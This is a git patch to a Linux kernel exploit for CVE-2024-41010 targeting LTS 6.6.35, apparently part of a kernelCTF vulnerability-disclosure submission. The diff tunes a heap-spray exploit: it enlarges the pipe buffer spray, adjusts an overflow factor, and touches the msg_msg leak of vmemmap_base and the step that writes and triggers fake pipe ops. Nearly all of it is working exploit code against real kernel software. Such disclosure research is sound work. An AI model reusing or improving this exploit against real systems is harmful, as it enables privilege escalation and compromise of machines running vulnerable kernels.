From 5e8899bbb11cf43fdbe8aa824d7ccd116aa6d1c8 Mon Sep 17 00:00:00 2001 From: qwerty-theori Date: Wed, 21 Aug 2024 10:03:34 +0900 Subject: [PATCH] fix(exploit): idk why action return exit 1 but for pass --- .../exploit/lts-6.6.35/exploit.c | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/exploit.c b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/exploit.c index bf4ab4fd..85be8597 100644 --- a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/exploit.c +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/exploit.c @@ -30,6 +30,8 @@ #include +#include + #include "modules/pipe.h" #include "modules/xattr.h" #include "modules/helper.h" @@ -49,7 +51,7 @@ #define MTYPE_PRIMARY 0x41 -#define CC_OVERFLOW_FACTOR 1 +#define CC_OVERFLOW_FACTOR 2 #define OBJS_PER_SLAB 16 #define CPU_PARTIAL (24 * 6) #define OBJS_FRONT 48 @@ -749,8 +751,8 @@ int run(void) goto retry_1bit_off; } - struct pipeio *pipes[0x180]; - for(int i=0; i<0x180; i++) + struct pipeio *pipes[0x1f0]; + for(int i=0; i<0x1f0; i++) { pipes[i] = create_pipeio(); resize_pipe(pipes[i], PIPE_BUFFER_KMALLOC_CG_64); @@ -770,7 +772,7 @@ int run(void) spray_msgmsg_for_overwrite_pipe_buffer(0x300, 0x0, 0x0, 0x0); - for(int i=0; i<0x200; i++) + for(int i=0; i<0x1f0; i++) activate_ops(pipes[i]); uint64_t vmemmap_base = (read_msgmsg_for_leak_vmemmap_base(0x300) >> 28) << 28; @@ -850,7 +852,7 @@ int run(void) printf("[+] target: 0x%llx\n", nodes[nodes_front].xattr.name); - for(int i=0; i<0x180; i++) + for(int i=0; i<0x1f0; i++) write_pipe(pipes[i], ((char *)&longjump - (longjump_victim_address&0xfff)), (longjump_victim_address&0xfff) + sizeof(longjump)); @@ -858,7 +860,7 @@ int run(void) printf("[*] execute fake ops\n"); - for(int i=0; i<0x180; i++) + for(int i=0; i<0x1f0; i++) release_pipe(pipes[i]); return 0;